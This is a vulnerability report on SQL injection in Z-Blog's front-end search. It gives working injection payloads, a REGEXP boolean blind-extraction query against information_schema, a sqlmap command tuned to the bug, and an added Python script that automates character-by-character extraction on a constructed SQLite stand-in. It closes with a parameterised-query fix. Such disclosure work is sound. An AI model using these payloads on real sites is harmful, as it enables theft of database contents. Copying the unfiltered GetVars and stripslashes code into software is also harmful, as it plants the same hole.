### Summary:
Second one... also, I have a question for your developers.
### Details:
The problem is in
/zb_system/function/c_system_common.php
```
function GetVars($name,$type='REQUEST'){
    // Pick the superglobal named by $type. There is no default branch,
    // so an unknown $type leaves $array undefined.
    if ($type=='ENV') {$array=&$_ENV;}
    if ($type=='GET') {$array=&$_GET;}
    if ($type=='POST') {$array=&$_POST;}
    if ($type=='COOKIE') {$array=&$_COOKIE;}
    if ($type=='REQUEST') {$array=&$_REQUEST;}
    if ($type=='SERVER') {$array=&$_SERVER;}
    if ($type=='SESSION') {$array=&$_SESSION;}
    if ($type=='FILES') {$array=&$_FILES;}
    if(isset($array[$name])){
        var_dump($array[$name]); // dumps the raw value (debug output)
        return $array[$name];    // returned as-is: no escaping, no validation
    }else{
        return null;
    }
}
```
The value from GET goes into the query in dbsql.php without any filtering.
Enter the injection payload in the front-end search box; `h` is a character that returns search results:
h%') and 1)#
![1.jpg](https://images.seebug.org/upload/201309/24114346b4796e74569456ade3719137ec351b74.jpg)
`and 1` can be replaced with the actual SQL injection; here a REGEXP-based boolean blind injection is used (the search returns results only when the subquery matches):
h%')and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="zblog" AND table_name REGEXP '^[a-z]' LIMIT 0,1))#
![2.jpg](https://images.seebug.org/upload/201309/241148287790c815773c56bfc9fd175507dd6fdc.jpg)
Narrow the regex one character at a time and the data can be read out character by character.
Manual injection is too painful, so use sqlmap (the `-p` option takes the parameter name, `q`; the prefix and suffix close the LIKE pattern and the surrounding parentheses exactly as in the manual payload above):
```
python sqlmap.py -u "<site>/search.php?q=<term that returns results>" -p q --prefix "%')" --suffix ")#"
```
![4.jpg](https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg)
![3.jpg](https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg)
I'd like to timidly ask: why convert `\'` back? Are you begging to be injected?
zblog/zb_system/function/c_system_base.php
```
function _stripslashes(&$val) {
    // Recursively remove the backslashes that magic_quotes_gpc added
    if(!is_array($val)) return stripslashes($val);
    foreach($val as $k => &$v) $val[$k] = _stripslashes($v);
    return $val;
}
// Undo magic quotes on every request, so a quote reaches the code unescaped
if(get_magic_quotes_gpc()){
    _stripslashes($_GET);
    _stripslashes($_POST);
    _stripslashes($_COOKIE);
}
```
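The following is an added example (not code from Z-Blog or from the reporter) that ties the two parts of this report together: it replays the character-by-character REGEXP blind extraction behind the `%')` / `)#` payloads, shows why the magic_quotes `\'` round-trip does not help, and puts a parameterised query next to the vulnerable one. Everything in it is a constructed stand-in: the `build_search_sql` query shape is a hypothetical reconstruction implied by the prefix and suffix (Z-Blog's real SQL is not quoted in the report), the database is in-memory SQLite rather than MySQL, so the trailing comment is `-- ` instead of `#` and table names come from `sqlite_master` instead of `information_schema.tables`, and the tables `zbp_post` / `zbp_member` are invented sample data.

```python
import re
import sqlite3

# Constructed stand-in for the target database so this runs offline.
# SQLite is used in place of MySQL: the trailing comment is "-- " instead
# of "#", and table names are read from sqlite_master instead of
# information_schema.tables. Table and column names are invented.
conn = sqlite3.connect(":memory:")
conn.create_function("regexp", 2,
                     lambda pattern, value: re.search(pattern, value or "") is not None)
conn.executescript("""
CREATE TABLE zbp_post(log_ID INTEGER PRIMARY KEY, log_Title TEXT, log_Content TEXT);
INSERT INTO zbp_post(log_Title, log_Content) VALUES ('hello world', 'h is a searchable letter');
CREATE TABLE zbp_member(mem_ID INTEGER PRIMARY KEY, mem_Name TEXT, mem_Password TEXT);
""")

PREFIX = "%')"   # closes the LIKE pattern and its parenthesis (as in the report)
SUFFIX = ")-- "  # closes the outer parenthesis; the MySQL target uses ")#"


def build_search_sql(q: str) -> str:
    """Hypothetical shape of the vulnerable search query: the raw q value is
    spliced straight into LIKE patterns. Implied by the prefix/suffix in the
    report; not Z-Blog's actual SQL."""
    return ("SELECT log_ID FROM zbp_post WHERE "
            f"((log_Title LIKE '%{q}%') OR (log_Content LIKE '%{q}%'))")


def oracle(q: str) -> bool:
    """Stand-in for requesting search.php?q=<q> and checking whether the
    results page lists any post (True) or none (False)."""
    return conn.execute(build_search_sql(q)).fetchone() is not None


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def blind_extract(known_true: str, subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction with REGEXP, as in the report: extend the
    known prefix one character at a time by testing '^<prefix><c>'. `subquery`
    contains {pattern} and yields one row only when the pattern matches."""
    found = ""
    while len(found) < max_len:
        for c in CHARSET:
            cond = subquery.format(pattern="^" + found + c)
            if oracle(f"{known_true}{PREFIX} and 1=({cond}){SUFFIX}"):
                found += c
                break
        else:
            break  # no candidate extends the prefix: the value is complete
    return found


TABLE_NAME_SUBQUERY = ("SELECT 1 FROM sqlite_master WHERE type='table' "
                       "AND name REGEXP '{pattern}' LIMIT 1")


def php_addslashes(s: str) -> str:
    """What magic_quotes_gpc did to every GET/POST/COOKIE value (NUL bytes ignored)."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def php_stripslashes(s: str) -> str:
    """Equivalent of PHP stripslashes(), which _stripslashes() in
    c_system_base.php applies to all of $_GET/$_POST/$_COOKIE."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def after_input_layer(raw_q: str, magic_quotes_on: bool) -> str:
    """The q value that reaches the query builder. With magic_quotes_gpc on,
    the quote arrives as \\' but _stripslashes() restores it, so both settings
    hand the same injectable string to the query."""
    return php_stripslashes(php_addslashes(raw_q)) if magic_quotes_on else raw_q


def search_ids_safe(q: str):
    """Hardened form: q is bound as data with a placeholder, never spliced into SQL."""
    pattern = "%" + q + "%"
    rows = conn.execute(
        "SELECT log_ID FROM zbp_post WHERE log_Title LIKE ? OR log_Content LIKE ?",
        (pattern, pattern)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print(oracle(f"h{PREFIX} and 1{SUFFIX}"))        # the report's first probe
    print(blind_extract("h", TABLE_NAME_SUBQUERY))   # recovers a table name
    print(after_input_layer("h%') and 1)#", True))   # the quote survives the round trip
    print(search_ids_safe("h%') and 1)-- "))         # payload is just a literal pattern
```

With the constructed data, `blind_extract` walks the charset to `zbp_member` in a few hundred oracle calls, which is exactly the loop sqlmap automates with `--prefix "%')" --suffix ")#"`. The `after_input_layer` call is the answer to the magic_quotes question: the `\'` that PHP added is removed again before the value reaches `GetVars`, so the application is relying on escaping it then throws away. The only fix that holds is the parameterised query in `search_ids_safe`, where the same payload is treated as a literal LIKE pattern and matches nothing.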
### Proof of vulnerability:
![4.jpg](https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg)
![3.jpg](https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg)